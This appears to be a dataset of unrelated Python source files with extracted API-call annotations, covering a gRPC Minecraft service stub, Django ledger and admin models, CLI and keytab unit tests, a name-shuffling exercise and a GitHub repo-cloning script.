response_deserializer=google_dot_protobuf_dot_empty__pb2.Empty.FromString,
)
class MinecraftServiceServicer(object):
"""*
The main service.
"""
def spawnBlocks(self, request, context):
"""* Spawn multiple blocks.
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def readCube(self, request, context):
"""* Return all blocks in a cube
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def fillCube(self, request, context):
"""* Fill a cube with a block type
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_MinecraftServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'spawnBlocks': grpc.unary_unary_rpc_method_handler(
servicer.spawnBlocks,
request_deserializer=minecraft__pb2.Blocks.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
'readCube': grpc.unary_unary_rpc_method_handler(
servicer.readCube,
request_deserializer=minecraft__pb2.Cube.FromString,
response_serializer=minecraft__pb2.Blocks.SerializeToString,
),
'fillCube': grpc.unary_unary_rpc_method_handler(
servicer.fillCube,
request_deserializer=minecraft__pb2.FillCubeRequest.FromString,
response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'dk.itu.real.ooe.MinecraftService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class MinecraftService(object):
"""*
The main service.
"""
@staticmethod
def spawnBlocks(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/spawnBlocks',
minecraft__pb2.Blocks.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def readCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/readCube',
minecraft__pb2.Cube.SerializeToString,
minecraft__pb2.Blocks.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def fillCube(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/dk.itu.real.ooe.MinecraftService/fillCube',
minecraft__pb2.FillCubeRequest.SerializeToString,
google_dot_protobuf_dot_empty__pb2.Empty.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
|
[
"grpc.method_handlers_generic_handler",
"grpc.unary_unary_rpc_method_handler",
"grpc.experimental.unary_unary"
] |
[((3232, 3329), 'grpc.method_handlers_generic_handler', 'grpc.method_handlers_generic_handler', (['"""dk.itu.real.ooe.MinecraftService"""', 'rpc_method_handlers'], {}), "('dk.itu.real.ooe.MinecraftService',\n rpc_method_handlers)\n", (3268, 3329), False, 'import grpc\n'), ((2367, 2572), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.spawnBlocks'], {'request_deserializer': 'minecraft__pb2.Blocks.FromString', 'response_serializer': 'google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString'}), '(servicer.spawnBlocks,\n request_deserializer=minecraft__pb2.Blocks.FromString,\n response_serializer=google_dot_protobuf_dot_empty__pb2.Empty.\n SerializeToString)\n', (2402, 2572), False, 'import grpc\n'), ((2660, 2838), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.readCube'], {'request_deserializer': 'minecraft__pb2.Cube.FromString', 'response_serializer': 'minecraft__pb2.Blocks.SerializeToString'}), '(servicer.readCube, request_deserializer\n =minecraft__pb2.Cube.FromString, response_serializer=minecraft__pb2.\n Blocks.SerializeToString)\n', (2695, 2838), False, 'import grpc\n'), ((2929, 3137), 'grpc.unary_unary_rpc_method_handler', 'grpc.unary_unary_rpc_method_handler', (['servicer.fillCube'], {'request_deserializer': 'minecraft__pb2.FillCubeRequest.FromString', 'response_serializer': 'google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString'}), '(servicer.fillCube, request_deserializer\n =minecraft__pb2.FillCubeRequest.FromString, response_serializer=\n google_dot_protobuf_dot_empty__pb2.Empty.SerializeToString)\n', (2964, 3137), False, 'import grpc\n'), ((3839, 4151), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/spawnBlocks"""', 'minecraft__pb2.Blocks.SerializeToString', 'google_dot_protobuf_dot_empty__pb2.Empty.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/spawnBlocks', minecraft__pb2.Blocks.\n SerializeToString, google_dot_protobuf_dot_empty__pb2.Empty.FromString,\n options, channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (3868, 4151), False, 'import grpc\n'), ((4505, 4793), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/readCube"""', 'minecraft__pb2.Cube.SerializeToString', 'minecraft__pb2.Blocks.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/readCube', minecraft__pb2.Cube.\n SerializeToString, minecraft__pb2.Blocks.FromString, options,\n channel_credentials, insecure, call_credentials, compression,\n wait_for_ready, timeout, metadata)\n", (4534, 4793), False, 'import grpc\n'), ((5147, 5466), 'grpc.experimental.unary_unary', 'grpc.experimental.unary_unary', (['request', 'target', '"""/dk.itu.real.ooe.MinecraftService/fillCube"""', 'minecraft__pb2.FillCubeRequest.SerializeToString', 'google_dot_protobuf_dot_empty__pb2.Empty.FromString', 'options', 'channel_credentials', 'insecure', 'call_credentials', 'compression', 'wait_for_ready', 'timeout', 'metadata'], {}), "(request, target,\n '/dk.itu.real.ooe.MinecraftService/fillCube', minecraft__pb2.\n FillCubeRequest.SerializeToString, google_dot_protobuf_dot_empty__pb2.\n Empty.FromString, options, channel_credentials, insecure,\n call_credentials, compression, wait_for_ready, timeout, metadata)\n", (5176, 5466), False, 'import grpc\n')]
|
# SORTEANDO UMA ORDEM NA LISTA
# O mesmo professor do ex 19 quer sortear a ordem de apresentação de trabalhos dos alunos. Faça um programa que leia o nome dos quatro alunos e mostre a ordem sorteada.
from random import sample, choice
a1 = input('Digite o nome do primeiro aluno: ')
a2 = input('Digite o nome do segundo aluno: ')
a3 = input('Digite o nome do terceiro aluno: ')
a4 = input('Digite o nome do quarto aluno: ')
lista = [a1, a2, a3, a4]
print(f'A ordem de apresentação sera a seguinte:{sample((lista),k=4)}')
|
[
"random.sample"
] |
[((504, 522), 'random.sample', 'sample', (['lista'], {'k': '(4)'}), '(lista, k=4)\n', (510, 522), False, 'from random import sample, choice\n')]
|
from tests.cli import commands
from click.testing import CliRunner
def test_get_not_found():
"""
Executes the kv get <key> command. The key does not exist yet so it
returns the Key Doesn't exist message and status_code. It validates
the output.
"""
runner = CliRunner()
result = runner.invoke(commands, ['get', 'lamsbda'])
expected_value = '{"status_code": 404, "error": "Key Doesn\'t exist"}\n\n'
assert result.exit_code == 0
assert result.output == expected_value
def test_put_value():
"""
Executes the kv put <key> <value> command. This puts the pair in the
key value store. Then we check the output as it should return a json
of the key-value pair.
"""
runner = CliRunner()
testPut = runner.invoke(commands, ['put', 'key1', 'value1'])
assert testPut.exit_code == 0
assert testPut.output == '{"key1": "value1"}\n\n'
def test_get_value():
"""
Executes kv get <key> command again but this time we check for the
key which we have added in above step. This validates the put
sub command as well.
"""
runner = CliRunner()
testGet = runner.invoke(commands, ['get', 'key1'])
assert testGet.exit_code == 0
assert testGet.output == '{"value": "value1"}\n\n'
|
[
"click.testing.CliRunner"
] |
[((284, 295), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (293, 295), False, 'from click.testing import CliRunner\n'), ((734, 745), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (743, 745), False, 'from click.testing import CliRunner\n'), ((1114, 1125), 'click.testing.CliRunner', 'CliRunner', ([], {}), '()\n', (1123, 1125), False, 'from click.testing import CliRunner\n')]
|
import os
import hashlib
import secrets
from django.db import models
from django.core.cache import cache
from django.db.models.signals import pre_save, pre_delete, post_migrate
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.postgres.fields import JSONField, ArrayField
def import_class(name):
components = name.split('.')
mod = __import__(components[0])
for comp in components[1:]:
mod = getattr(mod, comp)
return mod
class UserEntityBind(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='entities')
entity = models.CharField(max_length=64)
class Meta:
unique_together = ('entity', 'user')
class Ledger(models.Model):
entity = models.CharField(max_length=64, db_index=True, null=True)
name = models.CharField(max_length=512, db_index=True)
metadata = JSONField(null=True, default=None)
participants = ArrayField(models.CharField(max_length=128), null=True)
class Meta:
unique_together = ('entity', 'name')
class Transaction(models.Model):
ledger = models.ForeignKey(Ledger, on_delete=models.CASCADE)
txn = JSONField()
seq_no = models.IntegerField(null=True)
metadata = JSONField(null=True, default=None)
created = models.DateTimeField(auto_now_add=True, db_index=True, null=True)
actor_entity = models.CharField(max_length=64, db_index=True, null=True)
class Meta:
unique_together = ('seq_no', 'ledger')
class GURecord(models.Model):
entity = models.CharField(max_length=64, db_index=True)
category = models.CharField(max_length=36, db_index=True)
no = models.CharField(max_length=128)
date = models.CharField(max_length=128)
cargo_name = models.CharField(max_length=128)
depart_station = models.CharField(max_length=128)
arrival_station = models.CharField(max_length=128)
month = models.CharField(max_length=128)
year = models.CharField(max_length=128)
decade = models.CharField(max_length=128)
tonnage = models.CharField(max_length=128)
shipper = models.CharField(max_length=128)
attachments = JSONField()
class Content(models.Model):
STORAGE_FILE_SYSTEM = 'django.core.files.storage.FileSystemStorage'
SUPPORTED_STORAGE = [
(STORAGE_FILE_SYSTEM, 'FileSystemStorage'),
]
id = models.CharField(max_length=128, db_index=True)
uid = models.CharField(max_length=128, primary_key=True)
entity = models.CharField(max_length=1024, null=True, db_index=True)
name = models.CharField(max_length=512, db_index=True)
content_type = models.CharField(max_length=1024, null=True, db_index=True)
storage = models.CharField(max_length=256, db_index=True, choices=SUPPORTED_STORAGE, default=STORAGE_FILE_SYSTEM)
created = models.DateTimeField(null=True, auto_now_add=True)
updated = models.DateTimeField(null=True, auto_now=True)
is_avatar = models.BooleanField(default=False)
size_width = models.IntegerField(null=True)
size_height = models.IntegerField(null=True)
delete_after_download = models.BooleanField(default=False, db_index=True)
encoded = models.BooleanField(default=False, db_index=True)
download_counter = models.IntegerField(default=0, db_index=True)
md5 = models.CharField(max_length=128, null=True)
@property
def url(self):
return settings.MEDIA_URL + self.uid
def get_storage_instance(self):
cls = import_class(self.storage)
return cls()
def set_file(self, file):
self.name = file.name
self.content_type = file.content_type
_, ext = os.path.splitext(file.name.lower())
self.id = secrets.token_hex(16)
self.uid = self.id + ext
self.get_storage_instance().save(self.uid, file)
file.seek(0)
content = file.read()
self.md5 = hashlib.md5(content).hexdigest()
self.entity = settings.AGENT['entity']
pass
def delete(self, using=None, keep_parents=False):
try:
self.get_storage_instance().delete(self.uid)
except NotImplementedError:
pass
super().delete(using, keep_parents)
class Token(models.Model):
user = models.ForeignKey(User, on_delete=models.CASCADE)
created = models.DateTimeField(auto_now_add=True)
value = models.CharField(max_length=128, db_index=True)
entity = models.CharField(max_length=1024, db_index=True)
@staticmethod
def allocate(user: User):
inst = Token.objects.create(
user=user,
value=secrets.token_hex(16),
entity=settings.AGENT['entity']
)
return inst
def clear_txn_caches(instance, *args, **kwargs):
cache.delete(settings.INBOX_CACHE_KEY)
cache.delete(settings.LEDGERS_CACHE_KEY)
pre_save.connect(clear_txn_caches, sender=Ledger)
pre_save.connect(clear_txn_caches, sender=Transaction)
pre_delete.connect(clear_txn_caches, sender=Ledger)
pre_delete.connect(clear_txn_caches, sender=Transaction)
post_migrate.connect(clear_txn_caches, sender=Ledger)
post_migrate.connect(clear_txn_caches, sender=Transaction)
|
[
"django.db.models.signals.pre_save.connect",
"django.db.models.signals.post_migrate.connect",
"hashlib.md5",
"django.db.models.CharField",
"django.db.models.ForeignKey",
"secrets.token_hex",
"django.db.models.BooleanField",
"django.db.models.signals.pre_delete.connect",
"django.contrib.postgres.fields.JSONField",
"django.db.models.IntegerField",
"django.core.cache.cache.delete",
"django.db.models.DateTimeField"
] |
[((4827, 4876), 'django.db.models.signals.pre_save.connect', 'pre_save.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (4843, 4876), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4877, 4931), 'django.db.models.signals.pre_save.connect', 'pre_save.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (4893, 4931), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4932, 4983), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (4950, 4983), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((4984, 5040), 'django.db.models.signals.pre_delete.connect', 'pre_delete.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (5002, 5040), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((5041, 5094), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['clear_txn_caches'], {'sender': 'Ledger'}), '(clear_txn_caches, sender=Ledger)\n', (5061, 5094), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((5095, 5153), 'django.db.models.signals.post_migrate.connect', 'post_migrate.connect', (['clear_txn_caches'], {'sender': 'Transaction'}), '(clear_txn_caches, sender=Transaction)\n', (5115, 5153), False, 'from django.db.models.signals import pre_save, pre_delete, post_migrate\n'), ((544, 618), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE', 'related_name': '"""entities"""'}), "(User, on_delete=models.CASCADE, related_name='entities')\n", (561, 618), False, 'from django.db import models\n'), ((632, 663), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (648, 663), False, 'from django.db import models\n'), ((769, 826), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)', 'null': '(True)'}), '(max_length=64, db_index=True, null=True)\n', (785, 826), False, 'from django.db import models\n'), ((838, 885), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(512)', 'db_index': '(True)'}), '(max_length=512, db_index=True)\n', (854, 885), False, 'from django.db import models\n'), ((901, 935), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'null': '(True)', 'default': 'None'}), '(null=True, default=None)\n', (910, 935), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1121, 1172), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Ledger'], {'on_delete': 'models.CASCADE'}), '(Ledger, on_delete=models.CASCADE)\n', (1138, 1172), False, 'from django.db import models\n'), ((1183, 1194), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {}), '()\n', (1192, 1194), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1208, 1238), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (1227, 1238), False, 'from django.db import models\n'), ((1254, 1288), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {'null': '(True)', 'default': 'None'}), '(null=True, default=None)\n', (1263, 1288), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((1303, 1368), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)', 'db_index': '(True)', 'null': '(True)'}), '(auto_now_add=True, db_index=True, null=True)\n', (1323, 1368), False, 'from django.db import models\n'), ((1388, 1445), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)', 'null': '(True)'}), '(max_length=64, db_index=True, null=True)\n', (1404, 1445), False, 'from django.db import models\n'), ((1555, 1601), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'db_index': '(True)'}), '(max_length=64, db_index=True)\n', (1571, 1601), False, 'from django.db import models\n'), ((1617, 1663), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(36)', 'db_index': '(True)'}), '(max_length=36, db_index=True)\n', (1633, 1663), False, 'from django.db import models\n'), ((1673, 1705), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1689, 1705), False, 'from django.db import models\n'), ((1717, 1749), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1733, 1749), False, 'from django.db import models\n'), ((1767, 1799), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1783, 1799), False, 'from django.db import models\n'), ((1821, 1853), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1837, 1853), False, 'from django.db import models\n'), ((1876, 1908), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1892, 1908), False, 'from django.db import models\n'), ((1921, 1953), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1937, 1953), False, 'from django.db import models\n'), ((1965, 1997), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (1981, 1997), False, 'from django.db import models\n'), ((2011, 2043), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2027, 2043), False, 'from django.db import models\n'), ((2058, 2090), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2074, 2090), False, 'from django.db import models\n'), ((2105, 2137), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (2121, 2137), False, 'from django.db import models\n'), ((2156, 2167), 'django.contrib.postgres.fields.JSONField', 'JSONField', ([], {}), '()\n', (2165, 2167), False, 'from django.contrib.postgres.fields import JSONField, ArrayField\n'), ((2366, 2413), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'db_index': '(True)'}), '(max_length=128, db_index=True)\n', (2382, 2413), False, 'from django.db import models\n'), ((2424, 2474), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'primary_key': '(True)'}), '(max_length=128, primary_key=True)\n', (2440, 2474), False, 'from django.db import models\n'), ((2488, 2547), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'null': '(True)', 'db_index': '(True)'}), '(max_length=1024, null=True, db_index=True)\n', (2504, 2547), False, 'from django.db import models\n'), ((2559, 2606), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(512)', 'db_index': '(True)'}), '(max_length=512, db_index=True)\n', (2575, 2606), False, 'from django.db import models\n'), ((2626, 2685), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'null': '(True)', 'db_index': '(True)'}), '(max_length=1024, null=True, db_index=True)\n', (2642, 2685), False, 'from django.db import models\n'), ((2700, 2807), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(256)', 'db_index': '(True)', 'choices': 'SUPPORTED_STORAGE', 'default': 'STORAGE_FILE_SYSTEM'}), '(max_length=256, db_index=True, choices=SUPPORTED_STORAGE,\n default=STORAGE_FILE_SYSTEM)\n', (2716, 2807), False, 'from django.db import models\n'), ((2818, 2868), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'auto_now_add': '(True)'}), '(null=True, auto_now_add=True)\n', (2838, 2868), False, 'from django.db import models\n'), ((2883, 2929), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'null': '(True)', 'auto_now': '(True)'}), '(null=True, auto_now=True)\n', (2903, 2929), False, 'from django.db import models\n'), ((2946, 2980), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (2965, 2980), False, 'from django.db import models\n'), ((2998, 3028), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3017, 3028), False, 'from django.db import models\n'), ((3047, 3077), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'null': '(True)'}), '(null=True)\n', (3066, 3077), False, 'from django.db import models\n'), ((3106, 3155), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'db_index': '(True)'}), '(default=False, db_index=True)\n', (3125, 3155), False, 'from django.db import models\n'), ((3170, 3219), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'db_index': '(True)'}), '(default=False, db_index=True)\n', (3189, 3219), False, 'from django.db import models\n'), ((3243, 3288), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'db_index': '(True)'}), '(default=0, db_index=True)\n', (3262, 3288), False, 'from django.db import models\n'), ((3299, 3342), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'null': '(True)'}), '(max_length=128, null=True)\n', (3315, 3342), False, 'from django.db import models\n'), ((4236, 4285), 'django.db.models.ForeignKey', 'models.ForeignKey', (['User'], {'on_delete': 'models.CASCADE'}), '(User, on_delete=models.CASCADE)\n', (4253, 4285), False, 'from django.db import models\n'), ((4300, 4339), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (4320, 4339), False, 'from django.db import models\n'), ((4352, 4399), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'db_index': '(True)'}), '(max_length=128, db_index=True)\n', (4368, 4399), False, 'from django.db import models\n'), ((4413, 4461), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(1024)', 'db_index': '(True)'}), '(max_length=1024, db_index=True)\n', (4429, 4461), False, 'from django.db import models\n'), ((4741, 4779), 'django.core.cache.cache.delete', 'cache.delete', (['settings.INBOX_CACHE_KEY'], {}), '(settings.INBOX_CACHE_KEY)\n', (4753, 4779), False, 'from django.core.cache import cache\n'), ((4784, 4824), 'django.core.cache.cache.delete', 'cache.delete', (['settings.LEDGERS_CACHE_KEY'], {}), '(settings.LEDGERS_CACHE_KEY)\n', (4796, 4824), False, 'from django.core.cache import cache\n'), ((966, 998), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)'}), '(max_length=128)\n', (982, 998), False, 'from django.db import models\n'), ((3699, 3720), 'secrets.token_hex', 'secrets.token_hex', (['(16)'], {}), '(16)\n', (3716, 3720), False, 'import secrets\n'), ((3881, 3901), 'hashlib.md5', 'hashlib.md5', (['content'], {}), '(content)\n', (3892, 3901), False, 'import hashlib\n'), ((4589, 4610), 'secrets.token_hex', 'secrets.token_hex', (['(16)'], {}), '(16)\n', (4606, 4610), False, 'import secrets\n')]
|
"""Unit test for keytabs
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import io
import os
import shutil
import tempfile
import unittest
import mock
from treadmill import keytabs
class KeytabsTest(unittest.TestCase):
"""test keytabs function
"""
def setUp(self):
self.spool_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.spool_dir)
def _touch_file(self, name):
with io.open(os.path.join(self.spool_dir, name), 'w'):
pass
@mock.patch('treadmill.subproc.check_call')
def test_add_keytabs_to_file(self, mock_check_call):
"""test add keytabs princ files into dest file
"""
self._touch_file('HTTP#foo@realm')
self._touch_file('HTTP#bar@realm')
self._touch_file('host#foo@realm')
self._touch_file('host#bar@realm')
keytabs.add_keytabs_to_file(self.spool_dir, 'host', 'krb5.keytab')
try:
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#foo@realm'),
os.path.join(self.spool_dir, 'host#bar@realm'),
]
)
except AssertionError:
# then should called with files in other order
mock_check_call.assert_called_once_with(
[
'kt_add', 'krb5.keytab',
os.path.join(self.spool_dir, 'host#bar@realm'),
os.path.join(self.spool_dir, 'host#foo@realm'),
]
)
if __name__ == '__main__':
unittest.main()
|
[
"unittest.main",
"treadmill.keytabs.add_keytabs_to_file",
"mock.patch",
"tempfile.mkdtemp",
"shutil.rmtree",
"os.path.join"
] |
[((616, 658), 'mock.patch', 'mock.patch', (['"""treadmill.subproc.check_call"""'], {}), "('treadmill.subproc.check_call')\n", (626, 658), False, 'import mock\n'), ((1735, 1750), 'unittest.main', 'unittest.main', ([], {}), '()\n', (1748, 1750), False, 'import unittest\n'), ((414, 432), 'tempfile.mkdtemp', 'tempfile.mkdtemp', ([], {}), '()\n', (430, 432), False, 'import tempfile\n'), ((466, 495), 'shutil.rmtree', 'shutil.rmtree', (['self.spool_dir'], {}), '(self.spool_dir)\n', (479, 495), False, 'import shutil\n'), ((964, 1030), 'treadmill.keytabs.add_keytabs_to_file', 'keytabs.add_keytabs_to_file', (['self.spool_dir', '"""host"""', '"""krb5.keytab"""'], {}), "(self.spool_dir, 'host', 'krb5.keytab')\n", (991, 1030), False, 'from treadmill import keytabs\n'), ((551, 585), 'os.path.join', 'os.path.join', (['self.spool_dir', 'name'], {}), '(self.spool_dir, name)\n', (563, 585), False, 'import os\n'), ((1180, 1226), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#foo@realm"""'], {}), "(self.spool_dir, 'host#foo@realm')\n", (1192, 1226), False, 'import os\n'), ((1248, 1294), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#bar@realm"""'], {}), "(self.spool_dir, 'host#bar@realm')\n", (1260, 1294), False, 'import os\n'), ((1554, 1600), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#bar@realm"""'], {}), "(self.spool_dir, 'host#bar@realm')\n", (1566, 1600), False, 'import os\n'), ((1622, 1668), 'os.path.join', 'os.path.join', (['self.spool_dir', '"""host#foo@realm"""'], {}), "(self.spool_dir, 'host#foo@realm')\n", (1634, 1668), False, 'import os\n')]
|
"""
The MIT License (MIT)
Copyright (c) 2015 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
import json
import os
import subprocess
from urllib import request
repo_sources = [
'https://api.github.com/users/Akaito/repos?type=all',
]
class Repo:
@classmethod
def from_github_json(cls, jsn):
r = cls()
r.name = jsn['name']
r.title = r.name[len('codesaru-environ_project_'):]
r.description = jsn['description']
r.clone_url = jsn['clone_url']
return r
def __repr__(self):
return self.title
def find_repos(jsn):
repos = []
for repo_jsn in jsn:
r = Repo.from_github_json(repo_jsn)
if r is None:
continue
if 'codesaru-environ_project_' not in r.name:
continue
repos.append(r)
return repos
def main():
global repo_sources
repos = []
for repo_source_url in repo_sources:
response = request.urlopen(repo_source_url)
response_content = response.read()
repos_jsn = json.loads(response_content.decode())
repos.extend(find_repos(repos_jsn))
# present list of codesaru-environ/project compatible repos
for i in range(len(repos)):
print(i + 1, '--', repos[i].title)
print(' ', repos[i].description)
user_choice = 0
while int(user_choice) < 1 or int(user_choice) > len(repos):
user_choice = input('Enter project number to download: ')
user_choice = int(user_choice) - 1
repo = repos[user_choice]
subprocess.call(['git', 'clone', repo.clone_url, repo.title])
if __name__ == "__main__":
prior_dir = os.getcwd()
main()
os.chdir(prior_dir)
|
[
"os.getcwd",
"subprocess.call",
"os.chdir",
"urllib.request.urlopen"
] |
[((2342, 2403), 'subprocess.call', 'subprocess.call', (["['git', 'clone', repo.clone_url, repo.title]"], {}), "(['git', 'clone', repo.clone_url, repo.title])\n", (2357, 2403), False, 'import subprocess\n'), ((2445, 2456), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (2454, 2456), False, 'import os\n'), ((2466, 2485), 'os.chdir', 'os.chdir', (['prior_dir'], {}), '(prior_dir)\n', (2474, 2485), False, 'import os\n'), ((1812, 1844), 'urllib.request.urlopen', 'request.urlopen', (['repo_source_url'], {}), '(repo_source_url)\n', (1827, 1844), False, 'from urllib import request\n')]
|
from django.contrib import admin
# Register your models here.
from .models import Payment, ContractFile, Company, Contractor
@admin.register(Company)
class Company(admin.ModelAdmin):
list_display = (
'name',
)
@admin.register(Contractor)
class Contractor(admin.ModelAdmin):
list_display = (
'name',
)
|
[
"django.contrib.admin.register"
] |
